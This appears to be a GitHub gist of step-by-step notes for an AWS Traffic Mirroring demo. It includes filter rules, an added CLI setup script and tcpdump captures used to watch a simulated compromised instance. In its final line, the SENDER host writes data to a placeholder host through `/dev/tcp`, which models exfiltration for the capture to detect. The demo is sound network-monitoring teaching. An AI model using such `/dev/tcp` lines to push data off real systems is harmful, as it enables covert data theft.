amcginlay/433b6f495541727c999b0af51b4a6df7
Last active September 5, 2021 09:56
AWS Traffic Mirroring demo (from https://www.youtube.com/watch?v=ZYr8Uc3PJJQ)

Three EC2 instances: SENDER, RECIPIENT and WILDCARD (make these SSM Session Manager compatible)
SENDER - plays the compromised machine
RECIPIENT - where the mirrored traffic gets sent to
WILDCARD - another machine to which traffic can be sent

Create the Mirror Target, then the Filter, then the Session
Target: eth0 on RECIPIENT
Filter: nothing is mirrored unless a rule explicitly accepts it, so state what you expect to see.
- Reject port 22 INBOUND and OUTBOUND, with Source and Dest both 0.0.0.0/0
- Accept everything else OUTBOUND and INBOUND (but dropping the INBOUND creates some interesting discussion)
Session: source is eth0 on SENDER; set the mirror target and filter to the resources just created ^^^^
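The Target, Filter and Session steps above as AWS CLI calls; this is an added example, not part of the gist or the video. The two ENI ids come from the caller, while the rule numbers, the `no-ssh` description and the `DRY_RUN` switch are this script's own assumptions.

```shell
#!/bin/sh
# Added example, not from the gist: the Target -> Filter -> Session setup
# as AWS CLI calls. ENI ids come from the caller; rule numbers and the
# DRY_RUN switch are this script's own choices.
set -eu

# With DRY_RUN=1 the command is printed to stderr and a fake id returned,
# so the flow can be checked without touching an AWS account.
aws_cli() {
  if [ "${DRY_RUN:-0}" = 1 ]; then
    printf 'aws %s\n' "$*" >&2
    printf 'dry-run-id\n'
  else
    aws "$@"
  fi
}

# Per direction: reject TCP to or from port 22 first (lowest rule number
# is evaluated first), then accept everything else. Without the final
# accept rule the filter matches nothing and RECIPIENT sees no packets.
add_direction_rules() {
  tmf="$1"; dir="$2"; n=100
  for range in destination source; do
    aws_cli ec2 create-traffic-mirror-filter-rule --traffic-mirror-filter-id "$tmf" \
      --traffic-direction "$dir" --rule-number "$n" --rule-action reject \
      --protocol 6 "--${range}-port-range" FromPort=22,ToPort=22 \
      --source-cidr-block 0.0.0.0/0 --destination-cidr-block 0.0.0.0/0 >/dev/null
    n=$((n + 1))
  done
  aws_cli ec2 create-traffic-mirror-filter-rule --traffic-mirror-filter-id "$tmf" \
    --traffic-direction "$dir" --rule-number 200 --rule-action accept \
    --source-cidr-block 0.0.0.0/0 --destination-cidr-block 0.0.0.0/0 >/dev/null
}

# $1 = SENDER ENI (session source), $2 = RECIPIENT ENI (target); prints the session id.
setup_mirroring() {
  tmt=$(aws_cli ec2 create-traffic-mirror-target --network-interface-id "$2" \
    --description RECIPIENT --query TrafficMirrorTarget.TrafficMirrorTargetId --output text)
  tmf=$(aws_cli ec2 create-traffic-mirror-filter --description no-ssh \
    --query TrafficMirrorFilter.TrafficMirrorFilterId --output text)
  add_direction_rules "$tmf" ingress
  add_direction_rules "$tmf" egress
  aws_cli ec2 create-traffic-mirror-session --network-interface-id "$1" \
    --traffic-mirror-target-id "$tmt" --traffic-mirror-filter-id "$tmf" \
    --session-number 1 --query TrafficMirrorSession.TrafficMirrorSessionId --output text
}
if [ -n "${SENDER_ENI:-}" ] && [ -n "${RECIPIENT_ENI:-}" ]; then
  setup_mirroring "$SENDER_ENI" "$RECIPIENT_ENI"
fi
```

Run it as `SENDER_ENI=eni-... RECIPIENT_ENI=eni-... sh mirror.sh`, or with `DRY_RUN=1` first to review the exact commands it would issue.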
RECIPIENT: sudo tcpdump -i ens5 port not 22
SENDER: curl google.com
RECIPIENT: sudo tcpdump -i ens5 port not 22 -w session.pcap
SENDER: curl google.com
RECIPIENT: CTRL+C
WILDCARD: sudo nc -l -p 80
RECIPIENT: sudo tcpdump -i ens5 port not 22 -w session.pcap
SENDER: echo "MALWARE" > /dev/tcp/<WILDCARD_IP_ADDRESS>/80